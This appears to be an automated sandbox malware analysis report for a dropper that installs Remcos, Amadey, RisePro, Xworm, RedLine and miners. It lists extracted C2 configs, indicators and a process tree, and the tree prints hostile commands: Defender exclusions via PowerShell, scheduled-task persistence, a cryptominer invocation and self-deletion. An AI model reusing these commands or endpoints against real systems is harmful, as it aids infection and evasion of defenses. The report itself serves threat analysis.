amadey | 2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce

Resubmissions

09-04-2024 08:32

240409-kfg77aaf85 10

09-04-2024 08:32

09-04-2024 08:32

09-04-2024 08:32

11-03-2024 08:03

10-03-2024 15:15

Analysis

max time kernel
26s
max time network
1435s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
09-04-2024 08:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

FUCKER.exe
Size

10KB
MD5

2a94f3960c58c6e70826495f76d00b85
SHA1

e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
SHA256

2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
SHA512

fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
SSDEEP

192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K

Score

10^/10

amadey redline remcos risepro stealc xworm zgrat go!!!evasion infostealer rat stealer trojan

Malware Config

Extracted

Family

risepro

147.45.47.116:50500

Extracted

Family

remcos

Botnet

Go!!!

dangerous.hopto.org:2404

dangerous.hopto.org:2602

91.92.242.184:2602

91.92.242.184:2404

Attributes

audio_folder
??????????? ??????
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
taskhost.exe
copy_folder
System32
delete_file
false
hide_file
false
hide_keylog_file
true
install_flag
true
install_path
%AppData%
keylog_crypt
true
keylog_file
tapiui.dat
keylog_flag
false
keylog_folder
System32
mouse_option
false
mutex
???-LDKG91
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
?????????
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

amadey

Version

4.18

http://185.172.128.3

Attributes

install_dir
One_Dragon_Center
install_file
MSI.CentralServer.exe
strings_key
fd2f5851d3165c210396dcbe9930d294
url_paths
/QajE3OBS/index.php

rc4.plain

Extracted

Family

xworm

127.0.0.1:18356

t-brave.gl.at.ply.gg:18356

Attributes

Install_directory
%AppData%
install_file
OneDrive.exe

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ac25-273.dat	family_xworm
behavioral2/memory/4496-274-0x00000000002B0000-0x00000000002C6000-memory.dmp	family_xworm

Detect ZGRat V1 5 IoCs

resource	yara_rule
behavioral2/files/0x000800000001ac0e-7.dat	family_zgrat_v1
behavioral2/memory/352-10-0x00000000007C0000-0x0000000000CC4000-memory.dmp	family_zgrat_v1
behavioral2/memory/5068-276-0x0000000005100000-0x0000000005352000-memory.dmp	family_zgrat_v1
behavioral2/memory/5068-287-0x0000000005100000-0x000000000534D000-memory.dmp	family_zgrat_v1
behavioral2/memory/5068-284-0x0000000005100000-0x000000000534D000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ac27-311.dat	family_redline
behavioral2/files/0x000700000001ae7a-16452.dat	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

NirSoft WebBrowserPassView 1 IoCs

Password recovery tool for various web browsers

resource	yara_rule
behavioral2/files/0x000700000001ac49-1321.dat	WebBrowserPassView

Nirsoft 1 IoCs

resource	yara_rule
behavioral2/files/0x000700000001ac49-1321.dat	Nirsoft

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Executes dropped EXE 5 IoCs

pid	Process
352	ma.exe
1360	ama.exe
2840	Tinder%20Bot.exe
1112	.exe
5104	svcrun.exe

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	91.211.247.248

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Legitimate hosting services abused for malware hosting/C2 1 TTPs 55 IoCs

Web Service

T1102

flow	ioc
1248	bitbucket.org
508	raw.githubusercontent.com
595	raw.githubusercontent.com
771	raw.githubusercontent.com
776	raw.githubusercontent.com
21	raw.githubusercontent.com
672	raw.githubusercontent.com
568	raw.githubusercontent.com
717	raw.githubusercontent.com
929	raw.githubusercontent.com
271	raw.githubusercontent.com
22	raw.githubusercontent.com
506	raw.githubusercontent.com
631	raw.githubusercontent.com
1403	raw.githubusercontent.com
720	raw.githubusercontent.com
885	raw.githubusercontent.com
1069	raw.githubusercontent.com
1109	pastebin.com
391	bitbucket.org
585	raw.githubusercontent.com
589	raw.githubusercontent.com
630	raw.githubusercontent.com
674	raw.githubusercontent.com
718	pastebin.com
956	raw.githubusercontent.com
1062	raw.githubusercontent.com
959	raw.githubusercontent.com
390	bitbucket.org
678	raw.githubusercontent.com
1105	pastebin.com
629	raw.githubusercontent.com
765	raw.githubusercontent.com
972	raw.githubusercontent.com
1406	raw.githubusercontent.com
579	raw.githubusercontent.com
719	raw.githubusercontent.com
1045	raw.githubusercontent.com
1074	raw.githubusercontent.com
1104	pastebin.com
1408	raw.githubusercontent.com
570	raw.githubusercontent.com
583	raw.githubusercontent.com
952	raw.githubusercontent.com
996	raw.githubusercontent.com
588	raw.githubusercontent.com
1380	raw.githubusercontent.com
1269	bitbucket.org
587	raw.githubusercontent.com
598	raw.githubusercontent.com
632	raw.githubusercontent.com
774	raw.githubusercontent.com
671	raw.githubusercontent.com
713	raw.githubusercontent.com
1042	raw.githubusercontent.com

Looks up external IP address via web service 7 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
584	whoer.net
586	whoer.net
913	ip-api.com
1171	api.myip.com
1206	api.myip.com
1208	ipinfo.io
1209	ipinfo.io

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral2/files/0x000900000001ac42-1158.dat	autoit_exe
behavioral2/files/0x000800000001ac45-1511.dat	autoit_exe

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3320	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 20 IoCs

pid	pid_target	Process	procid_target
3624	5024	WerFault.exe	96
5200	4252	WerFault.exe	163
2748	5868	WerFault.exe	162
5484	5948	WerFault.exe	128
5336	1764	WerFault.exe	170
4112	1764	WerFault.exe	170
2756	1764	WerFault.exe	170
3568	1764	WerFault.exe	170
3708	1764	WerFault.exe	170
4292	1764	WerFault.exe	170
4132	1764	WerFault.exe	170
3116	1764	WerFault.exe	170
3380	5776	WerFault.exe	186
216	5636	WerFault.exe	204
3024	5636	WerFault.exe	204
5904	5636	WerFault.exe	204
1016	5636	WerFault.exe	204
4408	5636	WerFault.exe	204
960	5636	WerFault.exe	204
5184	5636	WerFault.exe	204

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3032	schtasks.exe
8636	schtasks.exe
3364	schtasks.exe
4140	schtasks.exe

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
4864	timeout.exe
3992	timeout.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
8380	WMIC.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
6196	tasklist.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
3392	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
5328	PING.EXE
8836	PING.EXE

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
1112	.exe
5104	svcrun.exe
5104	svcrun.exe
3544	powershell.exe
1180	powershell.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4616	FUCKER.exe
Token: SeDebugPrivilege	352	ma.exe
Token: SeDebugPrivilege	1112	.exe
Token: SeDebugPrivilege	5104	svcrun.exe
Token: SeDebugPrivilege	3544	powershell.exe
Token: SeDebugPrivilege	1180	powershell.exe

Suspicious use of WriteProcessMemory 25 IoCs

description	pid	Process	procid_target
PID 4616 wrote to memory of 352	4616	FUCKER.exe	73
PID 4616 wrote to memory of 352	4616	FUCKER.exe	73
PID 4616 wrote to memory of 1360	4616	FUCKER.exe	74
PID 4616 wrote to memory of 1360	4616	FUCKER.exe	74
PID 4616 wrote to memory of 1360	4616	FUCKER.exe	74
PID 352 wrote to memory of 4696	352	ma.exe	75
PID 352 wrote to memory of 4696	352	ma.exe	75
PID 4696 wrote to memory of 4864	4696	cmd.exe	78
PID 4696 wrote to memory of 4864	4696	cmd.exe	78
PID 4616 wrote to memory of 2840	4616	FUCKER.exe	79
PID 4616 wrote to memory of 2840	4616	FUCKER.exe	79
PID 4696 wrote to memory of 1112	4696	cmd.exe	80
PID 4696 wrote to memory of 1112	4696	cmd.exe	80
PID 1112 wrote to memory of 1016	1112	.exe	81
PID 1112 wrote to memory of 1016	1112	.exe	81
PID 1016 wrote to memory of 3364	1016	cmd.exe	83
PID 1016 wrote to memory of 3364	1016	cmd.exe	83
PID 4616 wrote to memory of 5104	4616	FUCKER.exe	84
PID 4616 wrote to memory of 5104	4616	FUCKER.exe	84
PID 5104 wrote to memory of 1180	5104	svcrun.exe	86
PID 5104 wrote to memory of 1180	5104	svcrun.exe	86
PID 5104 wrote to memory of 3544	5104	svcrun.exe	87
PID 5104 wrote to memory of 3544	5104	svcrun.exe	87
PID 5104 wrote to memory of 4992	5104	svcrun.exe	90
PID 5104 wrote to memory of 4992	5104	svcrun.exe	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
7312	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FUCKER.exe
"C:\Users\Admin\AppData\Local\Temp\FUCKER.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4616
- C:\Users\Admin\AppData\Local\Temp\Files\ma.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ma.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC0DF.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4696
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:4864
  - - C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
      "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1112
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1016
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:3364
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
        5⤵
        
        PID:5488
- C:\Users\Admin\AppData\Local\Temp\Files\ama.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ama.exe"
  2⤵
  - Executes dropped EXE
  PID:1360
- C:\Users\Admin\AppData\Local\Temp\Files\Tinder%20Bot.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Tinder%20Bot.exe"
  2⤵
  - Executes dropped EXE
  PID:2840
- C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svcrun.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5104
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1180
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3544
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEBB8.tmp.bat""
    3⤵
    PID:4992
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:3992
  - - C:\ProgramData\common\JTPFKOXW.exe
      "C:\ProgramData\common\JTPFKOXW.exe"
      4⤵
      PID:4712
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
        5⤵
        
        PID:4608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
        5⤵
        
        PID:3992
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"
        5⤵
        
        PID:4920
      - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "JTPFKOXW" /tr "C:\ProgramData\common\JTPFKOXW.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:4140
- C:\Users\Admin\AppData\Local\Temp\Files\new.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\new.exe"
  2⤵
  PID:784
- C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cayV0Deo9jSt417.exe"
  2⤵
  PID:4408
- - C:\Windows\SysWOW64\clip.exe
    "C:\Windows\SysWOW64\clip.exe"
    3⤵
    PID:4628
  - - C:\Users\Admin\AppData\Roaming\System32\taskhost.exe
      "C:\Users\Admin\AppData\Roaming\System32\taskhost.exe"
      4⤵
      PID:3156
- C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\timeSync.exe"
  2⤵
  PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\KJKEHIIJJE.exe"
    3⤵
    PID:5928
  - - C:\Users\Admin\AppData\Local\Temp\KJKEHIIJJE.exe
      "C:\Users\Admin\AppData\Local\Temp\KJKEHIIJJE.exe"
      4⤵
      PID:5684
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\KJKEHIIJJE.exe
        5⤵
        
        PID:5412
      - C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        6⤵
        Runs ping.exe
        
        PID:5328
- C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swiiiii.exe"
  2⤵
  PID:5024
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1372
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5024 -s 820
    3⤵
    - Program crash
    PID:3624
- C:\Users\Admin\AppData\Local\Temp\Files\amad.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\amad.exe"
  2⤵
  PID:5068
- C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\bc_memories_from_the_mcp.exe"
  2⤵
  PID:4732
- C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe"
  2⤵
  PID:4496
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe'
    3⤵
    PID:3088
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
    3⤵
    PID:5756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
    3⤵
    PID:3880
- C:\Users\Admin\AppData\Local\Temp\Files\TeamFour.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TeamFour.exe"
  2⤵
  PID:3696
- C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe"
  2⤵
  PID:3884
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\wefhrf.exe'; Add-MpPreference -ExclusionProcess 'wefhrf'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
    3⤵
    PID:4952
- C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjkl.exe"
  2⤵
  PID:2824
- C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
  2⤵
  PID:4380
- - C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
    3⤵
    PID:5752
- C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
  2⤵
  PID:5400
- - C:\Users\Admin\AppData\Local\directory\word.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
    3⤵
    PID:6088
  - - C:\Windows\SysWOW64\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\wininit.exe"
      4⤵
      PID:5448
  - - C:\Users\Admin\AppData\Local\directory\word.exe
      "C:\Users\Admin\AppData\Local\directory\word.exe"
      4⤵
      PID:5468
    - - C:\Windows\SysWOW64\svchost.exe
        
        "C:\Users\Admin\AppData\Local\directory\word.exe"
        5⤵
        
        PID:5524
- C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Mtkfarukc.exe"
  2⤵
  PID:5540
- C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\WatchDog.exe"
  2⤵
  PID:5948
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 1400
    3⤵
    - Program crash
    PID:5484
- C:\Users\Admin\AppData\Local\Temp\Files\Tdkdsxz.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Tdkdsxz.exe"
  2⤵
  PID:5128
- C:\Users\Admin\AppData\Local\Temp\Files\ps.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ps.exe"
  2⤵
  PID:5220
- C:\Users\Admin\AppData\Local\Temp\Files\ISetup8.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ISetup8.exe"
  2⤵
  PID:5568
- - C:\Users\Admin\AppData\Local\Temp\u4ao.0.exe
    "C:\Users\Admin\AppData\Local\Temp\u4ao.0.exe"
    3⤵
    PID:6032
- - C:\Users\Admin\AppData\Local\Temp\u4ao.1.exe
    "C:\Users\Admin\AppData\Local\Temp\u4ao.1.exe"
    3⤵
    PID:6120
  - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
      "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
      4⤵
      PID:200
- C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\nxmr.exe"
  2⤵
  PID:5600
- C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe"
  2⤵
  PID:5820
- - C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe
    C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe
    3⤵
    PID:5868
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 88
      4⤵
      Program crash
      PID:2748
- - C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe
    C:\Users\Admin\AppData\Local\Temp\Files\TvipY.exe
    3⤵
    PID:4252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 88
      4⤵
      Program crash
      PID:5200
- C:\Users\Admin\AppData\Local\Temp\Files\disable-defender.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\disable-defender.exe"
  2⤵
  PID:4460
- C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Qmpjm.exe"
  2⤵
  PID:6124
- C:\Users\Admin\AppData\Local\Temp\Files\swiiii.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\swiiii.exe"
  2⤵
  PID:5164
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4124
- C:\Users\Admin\AppData\Local\Temp\Files\Point.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Point.exe"
  2⤵
  PID:5744
- - C:\Windows\SysWOW64\ctfmon.exe
    "C:\Windows\SysWOW64\ctfmon.exe -p 1234"
    3⤵
    PID:32
- C:\Users\Admin\AppData\Local\Temp\Files\update.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\update.exe"
  2⤵
  PID:1660
- C:\Users\Admin\AppData\Local\Temp\Files\dais.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\dais.exe"
  2⤵
  PID:5352
- C:\Users\Admin\AppData\Local\Temp\Files\inte.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe"
  2⤵
  PID:1764
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 760
    3⤵
    - Program crash
    PID:5336
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 820
    3⤵
    - Program crash
    PID:4112
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 840
    3⤵
    - Program crash
    PID:2756
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 848
    3⤵
    - Program crash
    PID:3568
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 932
    3⤵
    - Program crash
    PID:3708
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 1112
    3⤵
    - Program crash
    PID:4292
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 1124
    3⤵
    - Program crash
    PID:4132
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 1764 -s 1328
    3⤵
    - Program crash
    PID:3116
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /im "inte.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\Files\inte.exe" & exit
    3⤵
    PID:2136
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /im "inte.exe" /f
      4⤵
      Kills process with taskkill
      PID:3392
- C:\Users\Admin\AppData\Local\Temp\Files\net.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\net.exe"
  2⤵
  PID:5700
- C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\ghjk.exe"
  2⤵
  PID:4648
- C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\asdfg.exe"
  2⤵
  PID:3060
- C:\Users\Admin\AppData\Local\Temp\Files\cp.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\cp.exe"
  2⤵
  PID:628
- C:\Users\Admin\AppData\Local\Temp\Files\crypted_33cb9091.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\crypted_33cb9091.exe"
  2⤵
  PID:5776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:1020
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5680
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:3368
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5776 -s 788
    3⤵
    - Program crash
    PID:3380
- C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Assistenza%20Updater.exe"
  2⤵
  PID:4112
- C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\lumma2.exe"
  2⤵
  PID:2812
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5604
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5204
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:2692
- C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\Opera_109.0.5097.38_Autoupdate_x64.exe"
  2⤵
  PID:5200
- C:\Users\Admin\AppData\Local\Temp\Files\fud.exe
  "C:\Users\Admin\AppData\Local\Temp\Files\fud.exe"
  2⤵
  PID:5636
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 688
    3⤵
    - Program crash
    PID:216
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 740
    3⤵
    - Program crash
    PID:3024
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 816
    3⤵
    - Program crash
    PID:5904
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 796
    3⤵
    - Program crash
    PID:1016
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 5636 -s 892
    3⤵
    - Program crash
    PID:4408
- - C:\Windows\SysWOW64\WerFault.exe
